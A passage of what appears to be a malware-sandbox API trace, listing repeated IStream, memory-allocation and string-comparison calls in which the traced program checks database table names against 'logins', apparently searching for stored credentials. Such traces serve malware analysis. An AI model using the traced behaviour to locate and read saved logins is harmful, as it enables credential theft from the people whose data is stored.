(This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.092] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.092] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.092] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.092] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.092] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.092] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.092] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d8d8 [0590.092] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.092] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x57c6e0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.092] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.092] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d840 [0590.092] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.092] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x57c6e0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x10, cb=0x0, dwLockType=0x0) returned 0x0 [0590.092] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.092] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.092] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x14, cb=0x0, dwLockType=0x0) returned 0x0 [0590.097] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.097] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.097] LocalAlloc (uFlags=0x40, uBytes=0xd1) returned 0x5dbdf0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x15, cb=0x0, dwLockType=0x0) returned 0x0 [0590.097] IStream:SetSize (This=0x5ec250, libNewSize=0x5dbdf0) returned 0x0 [0590.097] LocalAlloc (uFlags=0x40, uBytes=0xd9) returned 0x2ed0148 [0590.097] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.097] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.097] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.097] lstrcmpiA (lpString1="meta", lpString2="logins") returned 1 [0590.097] LocalFree (hMem=0x58d8d8) returned 0x0 [0590.097] LocalFree (hMem=0x58d840) returned 0x0 [0590.097] LocalFree (hMem=0x58d970) returned 0x0 [0590.097] LocalFree (hMem=0x58d548) returned 0x0 [0590.097] LocalFree (hMem=0x2ed0148) returned 0x0 [0590.097] LocalFree (hMem=0x570078) returned 0x0 [0590.097] IStream:LockRegion (This=0x57ea78, libOffset=0x67cf, cb=0x0, dwLockType=0x0) returned 0x0 [0590.097] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.097] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.097] IStream:LockRegion (This=0x57ea78, libOffset=0x67cf, cb=0x0, dwLockType=0x0) returned 0x0 [0590.097] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.097] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.097] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.097] IStream:LockRegion (This=0x57ea78, libOffset=0x67d0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.097] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.097] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.097] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.097] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.097] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.097] IStream:LockRegion (This=0x57ea78, libOffset=0x67d1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.097] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.097] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.097] LocalFree (hMem=0x2f09968) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.097] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.097] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.097] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.097] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.097] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.097] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.098] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.098] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.098] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.098] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.098] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.098] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.098] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0590.098] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.098] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.098] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.098] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.098] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.098] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0590.098] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.098] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ff38 [0590.098] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.098] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.098] IStream:LockRegion (This=0x5ec250, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.098] IStream:SetSize (This=0x5ec250, libNewSize=0x56ff38) returned 0x0 [0590.098] LocalAlloc (uFlags=0x40, uBytes=0x9f) returned 0x5d1978 [0590.098] LocalFree (hMem=0x56ff38) returned 0x0 [0590.098] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x57c6e0 [0590.098] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.098] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.098] IStream:LockRegion (This=0x5ec250, libOffset=0x22, cb=0x0, dwLockType=0x0) returned 0x0 [0590.098] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.098] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.098] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.098] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.098] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.098] IStream:LockRegion (This=0x5ec250, libOffset=0x26, cb=0x0, dwLockType=0x0) returned 0x0 [0590.098] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.098] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d840 [0590.098] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.098] LocalFree (hMem=0x570078) returned 0x0 [0590.098] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.098] lstrcmpiA (lpString1="meta", lpString2="logins") returned 1 [0590.098] LocalFree (hMem=0x58d548) returned 0x0 [0590.098] LocalFree (hMem=0x5d1978) returned 0x0 [0590.098] LocalFree (hMem=0x58d970) returned 0x0 [0590.098] LocalFree (hMem=0x58d840) returned 0x0 [0590.098] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.098] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.098] IStream:LockRegion (This=0x57ea78, libOffset=0x648a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.098] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.098] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.098] IStream:LockRegion (This=0x57ea78, libOffset=0x648a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.098] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.098] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.098] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.098] IStream:LockRegion (This=0x57ea78, libOffset=0x648b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.098] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.098] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.098] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.098] IStream:LockRegion (This=0x57ea78, libOffset=0x648c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.098] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.098] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.098] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.099] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.099] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.099] IStream:LockRegion (This=0x57ea78, libOffset=0x648d, cb=0x0, dwLockType=0x0) returned 0x0 [0590.099] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.099] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.099] LocalFree (hMem=0x2f09968) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.099] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.099] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ffd8 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.099] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.099] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.099] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.099] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.099] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.099] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.099] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.099] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.099] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.099] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d840 [0590.099] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.099] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.099] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.099] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d970 [0590.099] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.099] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x14, cb=0x0, dwLockType=0x0) returned 0x0 [0590.099] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.099] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d548 [0590.099] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.099] IStream:LockRegion (This=0x5ec250, libOffset=0x1c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.099] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.099] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d8d8 [0590.099] LocalAlloc (uFlags=0x40, uBytes=0x33d) returned 0x2f09968 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x1d, cb=0x0, dwLockType=0x0) returned 0x0 [0590.100] IStream:SetSize (This=0x5ec250, libNewSize=0x2f09968) returned 0x0 [0590.100] LocalAlloc (uFlags=0x40, uBytes=0x345) returned 0x2f09cb0 [0590.100] LocalFree (hMem=0x2f09968) returned 0x0 [0590.100] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.100] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.100] lstrcmpiA (lpString1="keywords", lpString2="logins") returned -1 [0590.100] LocalFree (hMem=0x58d840) returned 0x0 [0590.100] LocalFree (hMem=0x58d970) returned 0x0 [0590.100] LocalFree (hMem=0x58d548) returned 0x0 [0590.100] LocalFree (hMem=0x58d8d8) returned 0x0 [0590.100] LocalFree (hMem=0x2f09cb0) returned 0x0 [0590.100] LocalFree (hMem=0x570078) returned 0x0 [0590.100] IStream:LockRegion (This=0x57ea78, libOffset=0x637b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.100] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.100] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.100] IStream:LockRegion (This=0x57ea78, libOffset=0x637b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.100] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.100] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.100] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.100] IStream:LockRegion (This=0x57ea78, libOffset=0x637c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.100] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.100] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.100] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.100] IStream:LockRegion (This=0x57ea78, libOffset=0x637d, cb=0x0, dwLockType=0x0) returned 0x0 [0590.100] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.100] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.100] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.100] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.100] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.100] IStream:LockRegion (This=0x57ea78, libOffset=0x637e, cb=0x0, dwLockType=0x0) returned 0x0 [0590.100] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.100] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.100] LocalFree (hMem=0x2f09968) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.100] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.100] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x570078 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.100] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.100] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.100] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.100] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.100] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.101] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.101] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.101] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0590.101] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.101] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.101] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d8d8 [0590.101] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.101] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.101] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.101] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d548 [0590.101] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.101] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.101] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, 